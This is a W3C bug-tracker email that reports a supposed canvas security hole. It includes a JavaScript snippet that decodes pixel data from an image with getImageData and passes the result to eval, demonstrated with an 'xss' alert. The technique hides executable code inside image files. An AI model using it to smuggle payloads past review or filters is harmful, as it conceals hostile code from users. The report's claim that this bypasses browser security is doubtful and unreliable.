https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034
Bug ID: 20034
Summary: canvas getImageData opens security whole for code
Classification: Unclassified
Product: HTML WG
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: critical
Priority: P2
Component: HTML Canvas 2D Context
Assignee: jaymunro@microsoft.com
Reporter: bertram@n-bis.de
QA Contact: public-html-bugzilla@w3.org
CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
public-html@w3.org
Created attachment 1249
--> https://www.w3.org/Bugs/Public/attachment.cgi?id=1249&action=edit
sample image and html side
With the canvas it is possible to read byte data out of an image.
Images himself can come from different urls (hosts) without restriction.
What happens when someone fill an image with code values as pixel data, load
the image into an canvas and interpret it?
He could execute code without any knowledge of any security prevention because
the "code" are an image.
What I've done is simple:
1. create an image where the pixel are the color representation of
window['alert']('xss')
this could be an gif, png... It depends of the color interpolation in the
resulting image.
2. load the image into a web side
3. create an canvas object an put the image inside.
4. read the byte data of the canvas and cast it as string to eval
Eh viola
This is small js for it:
var img=new Image();
img.onload=function()
{
var ca = document.createElement('canvas');
ca.width=this.width;
ca.height=this.height;
var ctx = ca.getContext('2d');
ctx.drawImage(this,0,0);
var a="",d=ctx.getImageData(0, 0,this.width, this.height).data;
for(var i=0;i<d.length;i++){
if(d[i]<255) a+=String.fromCharCode(d[i]);
}
eval(a);
}
img.src="exploid.gif";
--
You are receiving this mail because:
You are on the CC list for the bug.